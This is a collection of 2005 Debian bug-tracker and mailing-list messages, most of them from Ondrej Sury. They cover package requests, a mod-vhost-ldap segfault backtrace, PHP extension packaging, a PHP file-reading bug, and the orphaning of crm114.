On Tue, 2005-08-23 at 14:49 +0200, Oliver Korff wrote: > Package: wnpp > Severity: wishlist > Owner: Oliver Korff <[EMAIL PROTECTED]> > > > * Package name: fruit > Version : 2.1 > Upstream Author : Fabien Letouzey > * URL : http://wbec-ridderkerk.nl/ > * License : (GPL) > Description : Fruit is an UCI-only chess engine. > Description: Fruit is an UCI-only chess engine. Fruit is a UCI-only > chess engine. This distribution comes up with an opening book and > platform-independent source code. You will need a frontend like > knights toplay against it. Sorry, but could you try to be more descriptive about what it does and what it is good for? You can explain what UCI-only mean. Also short description should not contain name of program. And since 'fruit' is very common, I would recommend renaming it to fruit-chess-engine (I think it would be more accurate). -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#323785: libapache2-mod-vhost-ldap: segfault with worker mpm, suexec and cgid
> mod-vhost-ldap segfaults when used with the Apache2 worker MPM, with > suExec and cgid enabled. (The Debian packages ensure cgid is used > with the worker MPM.) > > Here is a gdb backtrace, suitably cut: > > (gdb) bt > #0 0x405d0e8c in mod_vhost_ldap_get_suexec_id_doer (r=0x818e0b8) > at mod_vhost_ldap.c:468 > #1 0x08095a85 in ap_run_get_suexec_identity () > #2 0x08095c85 in ap_os_create_privileged_process () > #3 0x40586506 in ?? () from /usr/lib/apache2/modules/mod_cgid.so > > The module tries to do > > mod_vhost_ldap_config_t *cfg = > (mod_vhost_ldap_config_t *)ap_get_module_config(r->server->module_config, > &vhost_ldap_module); > > Which fails because r->server->module_config is null. At least I think > that's why it fails. > > (gdb) print r->server->module_config > $1 = (struct ap_conf_vector_t *) 0x0 > > I'm trying to figure out what this means, just recording this here. That's strange because I develop and run it on threaded apache2 without problems. Does it happen every time? O. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#156733: php4: Please enable pspell support
Hi Erich and Anthony, you may as well consider building separated source php-pspell and building php4-pspell and php5-pspell out of it using php{4,5}-dev. I think Adam has some plans with IMAP extension to make it example how it can be done. Adam? What do you think? Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> signature.asc Description: This is a digitally signed message part
Bug#322497: [php-maint] Bug#322497: Advanced PHP Debugger as extension
reassign 322497 wnpp retitle 322497 RFP: php5-apd -- Advanced PHP Debugger (zend_extension) thank you On Thu, 2005-08-11 at 01:57 +0200, Nathan Samson wrote: > Package: php5 > > Severity: wishlist > > "APD is the Advanced PHP Debugger. It was written to provide profiling > and debugging capabilities for PHP code, as well as to provide the > ability to print out a full stack backtrace. APD supports interactive > debugging, but by default it writes data to trace files. It also > offers event based logging so that varying levels of information > (including function calls, arguments passed, timings, etc.) can be > turned on or off for individual scripts." > > I like to see this as package, it is usefull for developing a PHP application > > Greetings > > Nathan Samson > > > ___ > pkg-php-maint mailing list > [EMAIL PROTECTED] > http://lists.alioth.debian.org/mailman/listinfo/pkg-php-maint -- Ondrej Sury <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#321930: [php-maint] Bug#321930: php5: critical Filesystem function related bug - PHP_STREAM_COPY_ALL set to 2000000
On Mon, 2005-08-08 at 12:03 +0200, Torsten Behrens wrote: > see php-dev mailinglist topic #32553 Please include full bug report next time, like this: Many file related functions are affected in php 5.0.4 They stop reading at 2,000,000 bytes. Fix is pending in CVS and it's likely being fixed in next upstream release. Don't make our lives even harded... :-). Ondrej. -- Ondrej Sury <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#310612: Please update gal to 2.4.3
This bug is fixed in upstream 2.4.3 version. Takuo would you be so kind to upload new version? Thanks, -- Ondrej Sury <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Bug#304762: RFA: crm114
Package: wnpp Severity: normal Due to lack of interest and lack of help from upstream (people stopped autoconfiscating package) I no longer have time or interest to maintain this package. Please someone (preferrably someone actively using it) take care of this baby. -- System Information: Debian Release: 3.1 APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Kernel: Linux 2.6.10-5-686 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) (ignored: LC_ALL set to C) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]